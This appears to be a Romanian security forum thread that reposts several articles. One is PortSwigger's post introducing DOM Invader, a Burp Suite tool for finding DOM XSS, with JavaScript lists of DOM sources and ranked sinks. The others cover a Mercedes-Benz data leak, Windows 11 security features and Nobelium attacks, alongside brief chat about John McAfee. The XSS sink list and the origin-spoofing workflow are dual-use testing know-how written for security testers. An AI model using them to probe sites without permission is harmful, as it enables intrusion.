we've always found it cumbersome to test for web-message vulnerabilities. Sure, you can add event listeners and breakpoints in Chrome - but there's no easy way to edit them without going to the effort of writing some JavaScript code. PortSwigger could hardly let this situation stand! So DOM Invader is set up to help you test for web-message vulnerabilities. "DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish." DOM Invader lets you see web messages and easily reissue them in its Postmessage tab. Again, we won't go into full details here (please see the documentation for that), but to access this functionality, just click on DOM Invader's icon in the embedded browser, and turn on "Postmessage interception". Through the Postmessage tab, you'll be able to see a bunch of useful information about any web messages your target sends. This includes their type (e.g. JSON string/JavaScript object), origin, actual data sent, and the location in the code where they occur (the Stack Trace). You can then click through to open a web message, where you can manipulate the data sent. You can also have DOM Invader spoof the origin of a web message, simply by clicking the "Spoof origin" check box. Pretty cool, right? If you find a vulnerable event listener and you've successfully crafted an exploit in the data box, then you can generate a proof of concept at the touch of a button. Simply click the "Build PoC" button, and your PoC will be copied to the clipboard. DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish. DOM Invader also attempts to grade the severity and confidence of messages it sees based on several factors - including if the message data was found in a sink and what type of sink it was. When messages are manipulated, DOM Invader will attempt to do a follow up with more interesting characters. If this is successful it will upgrade the severity and confidence based on the follow up characters that were found unencoded in the sink. List of sources and sinks Whilst developing DOM Invader we quite naturally needed a list of sources and sinks so we decided to produce one and put it into DOM Invader. We decided to release this list and terminology as it was trivial to extract from the source anyway. This will be included in the XSS cheat sheet when it's updated - but for now the current list will be added to this post. We use the sink ranking terminology in order to decide which sink is more important than others. The lower the value, the more important the sink is. Sources const sourcesList = [ "location", "location.href", "location.hash", "location.search", "location.pathname", "document.URL", "window.name", "document.referrer", "document.documentURI", "document.baseURI", "document.cookie" ]; Sinks const sinkRanking = { "jQuery.globalEval":1, "eval":2, "Function":3, "execScript":4, "setTimeout":5, "setInterval":6, "setImmediate":7, "msSetImmediate":7, "script.src":8, "script.textContent":9, "script.text":10, "script.innerText":11, "script.innerHTML":12, "script.appendChild":13, "script.append":14, "document.write": 15, "document.writeln": 16, "jQuery":17, "jQuery.$":18, "jQuery.constructor":19, "jQuery.parseHTML":20, "jQuery.has":20, "jQuery.init":20, "jQuery.index":20, "jQuery.add": 20, "jQuery.append": 20, "jQuery.appendTo": 20, "jQuery.after": 20, "jQuery.insertAfter": 20, "jQuery.before": 20, "jQuery.insertBefore": 20, "jQuery.html": 20, "jQuery.prepend": 20, "jQuery.prependTo": 20, "jQuery.replaceWith": 20, "jQuery.replaceAll": 20, "jQuery.wrap": 20, "jQuery.wrapAll": 20, "jQuery.wrapInner": 20, "jQuery.prop.innerHTML": 20, "jQuery.prop.outerHTML": 20, "element.innerHTML":21, "element.outerHTML":22, "element.insertAdjacentHTML":23, "iframe.srcdoc": 24, "location.href":25, "location.replace":26, "location.assign":27, "location":28, "window.open":29, "iframe.src":30, "javascriptURL":31, "jQuery.attr.onclick":32, "jQuery.attr.onmouseover":32, "jQuery.attr.onmousedown":32, "jQuery.attr.onmouseup":32, "jQuery.attr.onkeydown":32, "jQuery.attr.onkeypress":32, "jQuery.attr.onkeyup":32, "element.setAttribute.onclick":33, "element.setAttribute.onmouseover":33, "element.setAttribute.onmousedown":33, "element.setAttribute.onmouseup":33, "element.setAttribute.onkeydown":33, "element.setAttribute.onkeypress":33, "element.setAttribute.onkeyup":33, "createContextualFragment":34, "document.implementation.createHTMLDocument": 35, "xhr.open":36, "xhr.send": 36, "fetch": 36, "fetch.body": 36, "xhr.setRequestHeader.name": 37, "xhr.setRequestHeader.value": 38, "jQuery.attr.href":39, "jQuery.attr.src":40, "jQuery.attr.data":41, "jQuery.attr.action":42, "jQuery.attr.formaction":43, "jQuery.prop.href":44, "jQuery.prop.src":45, "jQuery.prop.data":46, "jQuery.prop.action":47, "jQuery.prop.formaction":48, "form.action":49, "input.formaction":50, "button.formaction":51, "button.value": 52, "element.setAttribute.href":53, "element.setAttribute.src":54, "element.setAttribute.data":55, "element.setAttribute.action":56, "element.setAttribute.formaction":57, "webdatabase.executeSql": 58, "document.domain":59, "history.pushState":60, "history.replaceState":61, "xhr.setRequestHeader":62, "websocket":63, "anchor.href":64, "anchor.target": 65, "JSON.parse": 66, "document.cookie":67, "localStorage.setItem.name": 68, "localStorage.setItem.value": 69, "sessionStorage.setItem.name": 70, "sessionStorage.setItem.value": 71, "element.outerText": 72, "element.innerText": 73, "element.textContent": 74, "element.style.cssText": 75, "RegExp":76, "window.name":77, "location.pathname": 78, "location.protocol": 79, "location.host": 80, "location.hostname": 81, "location.hash": 82, "location.search": 83, "input.value": 84, "input.type": 85, "document.evaluate": 86 }; Team effort I temporarily joined the PortSwigger Scanner team whilst developing this tool and I worked with so many talented people. It was a real team effort to produce the final product. I'd like to thank James Kettle for coming up with the idea to create an extension and for helping with the initial design. James was inspired by Filedescriptor's (Cure53) similar tool. I did some refactoring with Patrick Albinson and he proved he is a Gradle god when helping get DOM Invader into Burp. Alex Craig was heavily involved in refactoring and improving DOM Invader so much and made quite brilliant suggestions to move it lightyears ahead of the initial prototype. Paul Wilshaw improved the UI tremendously and made everything look pretty, especially the Postmessage features. Thanks to Nolan Ward for doing the video editing and creating the fantastic animation. Thanks to Matt Atkinson for helping with the copy editing and Nigel Evans for doing a great job with the documentation. Chris Wood really helped organizing UI sessions and finally I'd like to thank James Kettle, Michael Stepankin, Andrzej Matykiewicz and Trikster for being guinea pigs and UX testing the tool. Eating our own dog food Hopefully, you're now raring to go and find some DOM XSS with DOM Invader. We think there's plenty out there. In fact, we know there is, because we recently struck gold on a well-known bug bounty program while testing DOM Invader's functionality. Head over to the research channel to read up about the PayPal DOM XSS I found. To get started with DOM Invader, download the early adopter latest version of Burp Suite Professional/Community Edition and head to the embedded browser. View the full documentation for DOM Invader. Don't forget to follow @PortSwiggerRes on Twitter for the latest Burp Suite news and hacking exploits. That includes a writeup of the hack above. XSS DOM Hacking Tools Gareth Heyes @garethheyes Sursa: https://portswigger.net/blog/introducing-dom-invader

Da, da, e urat asta!

Merge!

@Andrei - Ceva?

https://www.digi24.ro/stiri/externe/ue/spania-autopsia-confirma-ca-john-mcafee-s-a-sinucis-in-inchisoare-sotia-acestuia-a-cerut-un-al-doilea-examen-medico-legal-1578545 Nu stiu ce sa zic ca nu prea am urmarit subiectul. Doar ca mi se parea un amuzant.

28 JUN 2021 NEWS Mercedes Benz Data Leak Includes Card and Social Security Details Phil Muncaster UK / EMEA News Reporter , Infosecurity Magazine Email Phil Follow @philmuncaster Mercedes Benz has released details of a data breach affecting customers and prospective buyers in the US. The luxury carmaker said a vendor had informed the company on June 11 that the information was “inadvertently made accessible on a cloud storage platform.” It appears that a third-party security researcher first raised the alarm. Although the initial investigation was set to discover whether 1.6 million unique records had been exposed, subsequent findings indicated far fewer customers and interested buyers were affected. “The vendor reports that the personal information for these individuals (less than 1,000) is comprised mainly of self-reported credit scores as well as a very small number of driver’s license numbers, social security numbers, credit card information and dates of birth,” the statement noted. “To view the information, one would need knowledge of special software programs and tools — an internet search would not return any information contained in these files.” These individuals entered the information in question on dealer and Mercedes-Benz websites between January 1, 2014, and June 19, 2017. Mercedes Benz USA confirmed that none of its systems were compromised in the incident and said the issue had been mitigated by the security vendor and can’t happen again. Although it’s unlikely that threat actors managed to locate and access the information, it’s unclear how long it had been exposed for. Mercedes-Benz USA has begun notifying those affected and said that anyone who had credit card information, driver’s license or social security numbers exposed will be offered a free 24-month subscription to a credit monitoring service. Tom Garrubba, CISO at risk management firm Shared Assessments, welcomed the carmaker’s prompt action. “With all the cyber-incidents that have been reported recently, it is refreshing to see that swift action taken by Mercedes Benz USA in addressing the incident with their cloud service provider and ultimately, with their customers," he added. “The reported breach of 1000 existing and prospective customers via their cloud storage vendor’s platform should raise awareness of the importance of proper due diligence and understanding as to how your cloud service providers are protecting your data.” Sursa: https://www.infosecurity-magazine.com/news/mercedes-benz-leak-card-social/

Windows 11 enables security by design from the chip to the cloud David Weston Director of Enterprise and OS Security Share Over the last year, PCs have kept us connected to family, friends, and enabled businesses to continue to run. This new hybrid work paradigm has got us thinking about how we will continue to deliver the best possible quality, experience, and security for the more than 1 billion people who use Windows. While we have adapted to working from home, it’s been rare to get through a day without reading an account of a new cybersecurity threat. Phishing, ransomware, supply chain, and IoT vulnerabilities—attackers are constantly developing new approaches to wreak digital havoc. But as attacks have increased in scope and sophistication, so have we. Microsoft has a clear vision for how to help protect our customers now and in the future and we know our approach works. Today, we are announcing Windows 11 to raise security baselines with new hardware security requirements built-in that will give our customers the confidence that they are even more protected from the chip to the cloud on certified devices. Windows 11 is redesigned for hybrid work and security with built-in hardware-based isolation, proven encryption, and our strongest protection against malware. Security by design: Built-in and turned on Security by design has long been a priority at Microsoft. What other companies invest more than $1 billion a year on security and employ more than 3,500 dedicated security professionals? We’ve made significant strides in that journey to create chip-to-cloud Zero Trust out of the box. In 2019, we announced secured-core PCs that apply security best-practices to the firmware layer, or device core, that underpins Windows. These devices combine hardware, software, and OS protections to help provide end-to-end safeguards against sophisticated and emerging threats like those against hardware and firmware that are on the rise according to the National Institute of Standards and Technology as well as the Department of Homeland Security. Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer. With Windows 11, we’re making it easier for customers to get protection from these advanced attacks out of the box. All certified Windows 11 systems will come with a TPM 2.0 chip to help ensure customers benefit from security backed by a hardware root-of-trust. The Trusted Platform Module (TPM) is a chip that is either integrated into your PC’s motherboard or added separately into the CPU. Its purpose is to help protect encryption keys, user credentials, and other sensitive data behind a hardware barrier so that malware and attackers can’t access or tamper with that data. PCs of the future need this modern hardware root-of-trust to help protect from both common and sophisticated attacks like ransomware and more sophisticated attacks from nation-states. Requiring the TPM 2.0 elevates the standard for hardware security by requiring that built-in root-of-trust. TPM 2.0 is a critical building block for providing security with Windows Hello and BitLocker to help customers better protect their identities and data. In addition, for many enterprise customers, TPMs help facilitate Zero Trust security by providing a secure element for attesting to the health of devices. Windows 11 also has out of the box support for Azure-based Microsoft Azure Attestation (MAA) bringing hardware-based Zero Trust to the forefront of security, allowing customers to enforce Zero Trust policies when accessing sensitive resources in the cloud with supported mobile device managements (MDMs) like Intune or on-premises. Raising the security baseline to meet the evolving threat landscape. This next generation of Windows will raise the security baseline by requiring more modern CPUs, with protections like virtualization-based security (VBS), hypervisor-protected code integrity (HVCI), and Secure Boot built-in and enabled by default to protect from both common malware, ransomware, and more sophisticated attacks. Windows 11 will also come with new security innovations like hardware-enforced stack protection for supported Intel and AMD hardware, helping to proactively protect our customers from zero-day exploits. Innovation like the Microsoft Pluton security processor, when used by the great partners in the Windows ecosystem, help raise the strength of the fundamentals at the heart of robust Zero Trust security. Ditch passwords with Windows Hello to help keep your information protected. For enterprises, Windows Hello for Business supports simplified passwordless deployment models for achieving a deploy-to-run state within a few minutes. This includes granular control of authentication methods by IT admins while securing communication between cloud tools to better protect corporate data and identity. And for consumers, new Windows 11 devices will be passwordless by default from day one. Security and productivity in one. All these components work together in the background to help keep users safe without sacrificing quality, performance, or experience. The new set of hardware security requirements that comes with this new release of Windows is designed to build a foundation that is even stronger and more resistant to attacks on certified devices. We know this approach works—secured-core PCs are twice as resistant to malware infection. Comprehensive security and compliance. Out of the box support for Microsoft Azure Attestation enables Windows 11 to provide evidence of trust via attestation, which forms the basis of compliance policies organizations can depend upon to develop an understanding of their true security posture. These Azure Attestation-backed compliance policies validate both the identity, as well as the platform, and form the backbone for the Zero Trust and Conditional Access workflows for safeguarding corporate resources. This next level of hardware security is compatible with upcoming Pluton-equipped systems and also any device using the TPM 2.0 security chip, including hundreds of devices available from Acer, Asus, Dell, HP, Lenovo, Panasonic, and many others. Windows 11 is a smarter way for everyone to collaborate, share, and present—with the confidence of hardware-backed protections. Learn more For more information, check out the other features that come with Windows 11: Windows 11 for Business Windows 11 for Enterprise To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Sursa: https://www.microsoft.com/security/blog/2021/06/25/windows-11-enables-security-by-design-from-the-chip-to-the-cloud/

Nobelium hackers accessed Microsoft customer support tools By Lawrence Abrams June 26, 2021 Microsoft says they have discovered new attacks conducted by the Russian state-sponsored Nobelium hacking group, including a hacked Microsoft support agent's computer that exposed customer's subscription information. Nobelium is Microsoft's name for a state-sponsored hacking group believed to be operating out of Russia responsible for the SolarWinds supply-chain attacks. In a new blog post published Friday night, Microsoft states that the hacking group has been conducting password spray and brute-force attacks to gain access to corporate networks. Password spray and brute force attacks are similar in that they both attempt to gain unauthorized accounts to an online account by guessing a password. However, password spray attacks will attempt to use the same passwords across multiple accounts simultaneously to evade defenses. In contrast, brute force attacks repeatedly target a single account with different password attempts. Microsoft says that Nobelium's recent attacks have been mostly unsuccessful. However, they know of three entities that were breached by Nobelium in these attacks. "This activity was targeted at specific customers, primarily IT companies (57%), followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services," Microsoft said in a blog post about the attacks. "The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted." Microsoft support tools accessed by hackers During the investigation into the attacks, Microsoft also detected an information-stealing trojan on a Microsoft customer support agent's computer that provided access to "basic account information" for a limited number of customers. Nobelium used this customer information in targeted phishing attacks against Microsoft customers. Microsoft reported these attacks after Reuters obtained an email sent to affected customers warning them that the threat actors gained access to information about their Microsoft Services subscriptions. "A sophisticated Nation-State associated actor that Microsoft identifies as NOBELLIUM accessed Microsoft customer support tools to review information regarding your Microsoft Services subscriptions," read the Microsoft email obtained by Reuters. Nobelium's recent activity The Nobelium hacking group, also known as APT29, Cozy Bear, and The Dukes, has been attributed to the recent SolarWinds supply chain attack that compromised numerous US companies, including Microsoft, FireEye, Cisco, Malwarebytes, Mimecast, and various US government agencies. As part of these attacks, the threat actors replaced legitimate modules in the SolarWinds Orion IT monitoring platform that were distributed to customers via the software's normal auto-update process. These malicious modules allowed the threat actors to gain remote access to compromised devices, where further internal attacks could be launched. In April, the US government formally accused the Russian government and hackers from the Russian Foreign Intelligence Service, the SVR, of the attacks on Solarwinds and US interests. More recently, Microsoft revealed that the hacking group compromised the Constant Contact account for USAID, a US agency responsible for providing foreign aid and development assistance. Using this marketing account, Nobelium conducted targeted phishing attacks to distribute malware and access internal networks. USAID phishing email sent by Nobelium hackers The US Department of Justice later seized two domains used in the phishing attacks to distribute malware. Sursa: https://www.bleepingcomputer.com/news/microsoft/nobelium-hackers-accessed-microsoft-customer-support-tools/

E suspect, ca anul trecut prin octombrie zicea ca nu are de gand sa faca asta. Pe de alta parte, daca era extradat in SUA nu mai iesea din puscarie. Oricum e ciudat ce s-a intamplat cu el.

https://www.agerpres.ro/economic-extern/2021/06/24/microsoft-prezinta-joi-o-noua-versiune-a-sistemului-de-operare-windows--736653?